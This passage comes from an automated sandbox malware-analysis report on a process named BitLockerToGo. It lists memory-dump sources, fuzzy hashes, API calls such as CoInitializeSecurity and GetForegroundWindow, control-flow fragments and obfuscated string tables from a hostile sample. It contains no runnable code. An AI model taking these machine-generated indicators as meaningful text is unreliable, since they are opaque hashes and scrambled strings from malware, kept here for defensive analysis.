                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 38261cc735861fbdd88d2000c2f806e9395a79578483032bbe7b149c62570012
                                                                              • Instruction ID: ba0a3e8c5f04431279f0ffa3baa00b19fb30dcdd6b7c7a58a299bf23672b2dbc
                                                                              • Opcode Fuzzy Hash: 38261cc735861fbdd88d2000c2f806e9395a79578483032bbe7b149c62570012
                                                                              • Instruction Fuzzy Hash: D8526AB0609B818ED3258F3C8815797BFD5AB5B324F148A6EA0FE873D2C7756101CB66
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: e5722060427a27380265e6bf6cffebcd19a0928a8642c930466b2e8bfaae4abf
                                                                              • Instruction ID: 928d84de5f5446004bfcaba00d228487210a7c0ac4a04698b5fca005f4656c32
                                                                              • Opcode Fuzzy Hash: e5722060427a27380265e6bf6cffebcd19a0928a8642c930466b2e8bfaae4abf
                                                                              • Instruction Fuzzy Hash: A7C13872A083114BE718EE248C9173FB7A2ABD5314F288E3EE5A657351D739EC01C799
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 398f21818c89d6ff29d2a017a7e96675d5f981a416108cbb10ebe9484daa01fb
                                                                              • Instruction ID: f8e1bdf0dd448568376a14a625da659fd21aa1e3bb1fae33c6517100f16624e0
                                                                              • Opcode Fuzzy Hash: 398f21818c89d6ff29d2a017a7e96675d5f981a416108cbb10ebe9484daa01fb
                                                                              • Instruction Fuzzy Hash: CF714BB16047004BD7249F349C82BBF73A6DBD1318F19C53EE84A5B392E67D9C09875A
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: c4ab0a9c55f3ab5e0a0694ab7d34786f73a0f4d8b3be6ee0456e18111c2b004a
                                                                              • Instruction ID: 43f8e81aaeb7cbe2869028f15bc6a144c8b042c8a1f2ede789f8ddb707ad8acd
                                                                              • Opcode Fuzzy Hash: c4ab0a9c55f3ab5e0a0694ab7d34786f73a0f4d8b3be6ee0456e18111c2b004a
                                                                              • Instruction Fuzzy Hash: E4814635A053119BD724EF28C880A6FB3A2FFD5340F15C92EE4868B394DB74AC14D78A
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 53ddf43a139e5153bdb876e427c0ac12c0813785c1a1a19694b5c8797f5b20b9
                                                                              • Instruction ID: 7b5872222cd48303d1b01ab4b0ec451f5d8523d1bfbb8ac350931bc692acd10e
                                                                              • Opcode Fuzzy Hash: 53ddf43a139e5153bdb876e427c0ac12c0813785c1a1a19694b5c8797f5b20b9
                                                                              • Instruction Fuzzy Hash: A8615C76A046108FD724EF29CC80A3FB3A2EBD5714F1E893ED586AB341D635AC01C799
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3e8d24c377f8db7a9cfe85756fd1990a430c0911c02fb4bbb2ffbbb7b9d8269e
                                                                              • Instruction ID: 0158569c66b7e6969d3c57d797b42dfedae0ce0a1fd6af4637501fc962208989
                                                                              • Opcode Fuzzy Hash: 3e8d24c377f8db7a9cfe85756fd1990a430c0911c02fb4bbb2ffbbb7b9d8269e
                                                                              • Instruction Fuzzy Hash: 3B4159757046105BE629A72158127BF3311AF9931DF04023EE84B27383DB2D6E1B86DF
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: d6c65acd3653b84d232afa4b9557a6a8a5206b52c21188a0e01b6b6768659cbd
                                                                              • Instruction ID: e1acbddb64c3ec3edca177c264d1f6bb1ec8a654ea992703d7d109096a258b92
                                                                              • Opcode Fuzzy Hash: d6c65acd3653b84d232afa4b9557a6a8a5206b52c21188a0e01b6b6768659cbd
                                                                              • Instruction Fuzzy Hash: 44412435A05305AFE714EB24DC90F7FB3A6EB95304F24883EE58597390D728EC148759
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8093164e5e5cec5b42e4dbaa24ed5ccce22a8c7c88b6609bf05d533461eb0090
                                                                              • Instruction ID: a86113fc2756fdb3b3c7bc428b693166993456784e3e089405ed62602daf98cd
                                                                              • Opcode Fuzzy Hash: 8093164e5e5cec5b42e4dbaa24ed5ccce22a8c7c88b6609bf05d533461eb0090
                                                                              • Instruction Fuzzy Hash: 1A1121B168C308AFD718EFA4999072BB7E1ABD5300F20D43DE19247348DA74A809DB4A

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetCurrentProcessId.KERNEL32 ref: 004587DA
                                                                              • GetCurrentThreadId.KERNEL32 ref: 004587E0
                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004587EF
                                                                              • GetForegroundWindow.USER32(?,00000010,00000000), ref: 004587F5
                                                                                • Part of subcall function 0045CBB0: CoInitializeEx.COMBASE(00000000,00000002), ref: 0045CBC3
                                                                                • Part of subcall function 0045B610: FreeLibrary.KERNEL32(0045881B,00000010,00000000), ref: 0045B616
                                                                                • Part of subcall function 0045B610: FreeLibrary.KERNEL32 ref: 0045B637
                                                                              • ExitProcess.KERNEL32 ref: 00458822
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                                                                              • String ID: assddasads
                                                                              • API String ID: 3072701918-2257728860
                                                                              • Opcode ID: 93c61de7b5ad2cd0a3ff7a56f12cd4dae2c608ee8590b36bacb1f1e44969642e
                                                                              • Instruction ID: 5773c03fd7ede56625349540260d1391d79d4f33d2f79de4376fe3ad3197d47c
                                                                              • Opcode Fuzzy Hash: 93c61de7b5ad2cd0a3ff7a56f12cd4dae2c608ee8590b36bacb1f1e44969642e
                                                                              • Instruction Fuzzy Hash: 56F030702442007BEE107BF2AD0BB1C3A109F11B0BF14057BBE86696D7DE9D685C86AF

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1308 48af60-48af71 1309 48af78-48af7f 1308->1309 1310 48afaf-48afb8 call 4897a0 1308->1310 1311 48afa0 1308->1311 1312 48afa2 1308->1312 1313 48afa4-48afad call 489780 1308->1313 1314 48af86-48af9f call 48c7b0 RtlReAllocateHeap 1308->1314 1309->1310 1309->1311 1309->1312 1309->1314 1316 48afba-48afbc 1310->1316 1311->1312 1312->1316 1313->1316 1314->1311
                                                                              APIs
                                                                              • RtlReAllocateHeap.NTDLL(?,00000000,/uH,?,00004000,?,0048752F,00000000,00004000), ref: 0048AF92
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID: /uH
                                                                              • API String ID: 1279760036-3860831454
                                                                              • Opcode ID: 0bb74e6ef5543dae9438b43e30c3272b1801eed9d5f68759c8e5da7b6651f35c
                                                                              • Instruction ID: 4fbf9ef1171710106a7078b65ecd51c93077c9ec8fd28b24b9d896d966c7b5a2
                                                                              • Opcode Fuzzy Hash: 0bb74e6ef5543dae9438b43e30c3272b1801eed9d5f68759c8e5da7b6651f35c
                                                                              • Instruction Fuzzy Hash: 7DF0A775918112EBD2003F24BC1596B7668AFD6715F160C3BE906A3111D639E812C79E

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1322 4897a0-4897ac 1323 4897bb 1322->1323 1324 4897cb-4897d8 RtlFreeHeap 1322->1324 1325 4897c0 call 48c7b0 1322->1325 1326 4897b3-4897b4 1322->1326 1327 4897b5 1322->1327 1323->1325 1329 4897bb call 48c7b0 1323->1329 1330 4897c5 1325->1330 1327->1323 1329->1325 1330->1330
                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(?,00000000,/uH,0048AFB5,/uH,?,0048752F,00000000,00004000), ref: 004897D1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: FreeHeap
                                                                              • String ID: /uH
                                                                              • API String ID: 3298025750-3860831454
                                                                              • Opcode ID: f41bc48e311ac12eb0347b5e426ff7f2534258eb06a31b974caabdcfada08b99
                                                                              • Instruction ID: 018899db27f1c0ed65cd1dfd4d63f48270e87132da8ae14259e2c5409c5b89cc
                                                                              • Opcode Fuzzy Hash: f41bc48e311ac12eb0347b5e426ff7f2534258eb06a31b974caabdcfada08b99
                                                                              • Instruction Fuzzy Hash: D8D01731408122EFCA202F24BC1268A3A64AF59321F4748B3B8006A070C7368C91CBA8
                                                                              APIs
                                                                              • GetUserDefaultUILanguage.KERNELBASE ref: 00485E7D
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: DefaultLanguageUser
                                                                              • String ID:
                                                                              • API String ID: 95929093-0
                                                                              • Opcode ID: 94cc62167d4f2927953c8c93d5a5602b978471322c993c1bb5cf2342a0836cb7
                                                                              • Instruction ID: 58329b4baa1dd2d392eb6806f26a49ded4c771083c596f9874d849d3d63250ff
                                                                              • Opcode Fuzzy Hash: 94cc62167d4f2927953c8c93d5a5602b978471322c993c1bb5cf2342a0836cb7
                                                                              • Instruction Fuzzy Hash: 2D11A1349056848FCB25DF3899502ADBFB16F5B310F1441EDD4A6AB392D6355901CF15
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: BlanketProxy
                                                                              • String ID:
                                                                              • API String ID: 3890896728-0
                                                                              • Opcode ID: 55e096324cc1512454292523568d881810f2a1fa1d2cd0a30cedbcd38c294eaf
                                                                              • Instruction ID: 6cf92ac6cb230df1ae80f0b3e12634edc0938ded4a47846904d4bde15aa58f57
                                                                              • Opcode Fuzzy Hash: 55e096324cc1512454292523568d881810f2a1fa1d2cd0a30cedbcd38c294eaf
                                                                              • Instruction Fuzzy Hash: 47F01D74504741CFD315DF24C4A874ABBF1FB84304F14891DE0958B394C7B5AA48CF82
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: BlanketProxy
                                                                              • String ID:
                                                                              • API String ID: 3890896728-0
                                                                              • Opcode ID: 0256a9aa9fc66fa86d469f1b8ceb78b6fa03690f5f6851c43df111ad7db58eb7
                                                                              • Instruction ID: 65a2f9d06f16b0a3d10d0a89ab7fa3ca0932a840de58a4da548a81e3f74729b1
                                                                              • Opcode Fuzzy Hash: 0256a9aa9fc66fa86d469f1b8ceb78b6fa03690f5f6851c43df111ad7db58eb7
                                                                              • Instruction Fuzzy Hash: DEF074B4508701CFE314DF29D5A8B5ABBF0FB84308F10991DE5998B390DBB6A549CF82
                                                                              APIs
                                                                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 0045CBC3
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: Initialize
                                                                              • String ID:
                                                                              • API String ID: 2538663250-0
                                                                              • Opcode ID: 24b609a697868a852c5dc6af36ff8ff9acc99407f13f1741b818ca7795f69d27
                                                                              • Instruction ID: f55783ee0e5660a926deec4e8a5d46a9a90391f44aedd9f417ec7d05ad58ea42
                                                                              • Opcode Fuzzy Hash: 24b609a697868a852c5dc6af36ff8ff9acc99407f13f1741b818ca7795f69d27
                                                                              • Instruction Fuzzy Hash: 69D02E202941047BC208AF28EC1AF2233D8EB02354F00023AE1528A6E2E860B801C2A9
                                                                              APIs
                                                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0045CBF7
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeSecurity
                                                                              • String ID:
                                                                              • API String ID: 640775948-0
                                                                              • Opcode ID: 7af51ba199a84f32cd2e10970bb998fb75a4900976f0df57f25fa4c482637a87
                                                                              • Instruction ID: 7e6ce694cedc3b849b9fae5a7e43f055515c768d4c887ea1c65d673279eb1c08
                                                                              • Opcode Fuzzy Hash: 7af51ba199a84f32cd2e10970bb998fb75a4900976f0df57f25fa4c482637a87
                                                                              • Instruction Fuzzy Hash: 67D0C9303C43007AF6749B18ED13F1432515751F15F700239B326FE6E0C9D0B111961C
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(?,00000000,?,?,0048AFAA,?,?,?,?,?,?,004587CE,00002270,assddasads), ref: 00489790
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: 78a9039f7314ae258d7542460b6397c0bd73b5017ecc95778e14da29776aefb4
                                                                              • Instruction ID: 53ea9dd1e67fe337e254dc81e79d64ba12fa62135ae45b26c727ac7ade05bf84
                                                                              • Opcode Fuzzy Hash: 78a9039f7314ae258d7542460b6397c0bd73b5017ecc95778e14da29776aefb4
                                                                              • Instruction Fuzzy Hash: AEC09231056131ABCA103B15FC49FCA3F68EF46361F0A04A6B408B70B1C770AC82CBE8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: !$#$#$#$%$'$($)$*$*$+$+$0$1$1$4$7$>$?$A$E$L$N$R$S$V$X$X$[$^$_$d$d$e$f$g$i$j$k$m$w$w$y$z$}
                                                                              • API String ID: 0-384021127
                                                                              • Opcode ID: 928d940d490a7de0023e4044264ffd47cd85c388aef62e53aafcbe5fe323c2ab
                                                                              • Instruction ID: 151498fb53b469acd8f5a0c2296393f3aec24819579afd1b0654283f695c213b
                                                                              • Opcode Fuzzy Hash: 928d940d490a7de0023e4044264ffd47cd85c388aef62e53aafcbe5fe323c2ab
                                                                              • Instruction Fuzzy Hash: B4224F209087EA89DB32C63C8C087DDBE615B67324F0847D9D1E96B3D2D7750B86CB66
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: #$2$2$7-`n$:":}$KIUH$N$UIWP$^EW]$_$kwk*$lh~j$n;"e$r|zr$uc`|$uq{q$xcyl$}t/1$-@
                                                                              • API String ID: 0-6594331
                                                                              • Opcode ID: 8e77003b963f019080fd3a56813e995eab712eb54379353fa5ea939999135057
                                                                              • Instruction ID: f1c89faab74fe1900848accca58d8f87d5a79741142d022a0fbbbab72ef44a4a
                                                                              • Opcode Fuzzy Hash: 8e77003b963f019080fd3a56813e995eab712eb54379353fa5ea939999135057
                                                                              • Instruction Fuzzy Hash: 6BA1F57124C3918BC3128F39846076BBFE1AFD7641F5849ADE8D54B382C3798D0AC766
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: *;$+gi$01$5;$5I$96$:xz$:xz$;<$NO$W%U'$^-J/$_)E+$p!C#$KM$WY$pr
                                                                              • API String ID: 0-4251274269
                                                                              • Opcode ID: 56ea174b95a72c8ea72296f99f3ae035a84ef8136f4722a4180e88562fa25b36
                                                                              • Instruction ID: 121ea4d15c11b6c463b2a93839599ce33d75300967189005d4e302864080f1af
                                                                              • Opcode Fuzzy Hash: 56ea174b95a72c8ea72296f99f3ae035a84ef8136f4722a4180e88562fa25b36
                                                                              • Instruction Fuzzy Hash: A49261B560C3818AD334CF24D841BAFBBF2FBD1304F05892EE5D95B251D7758A468B8A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
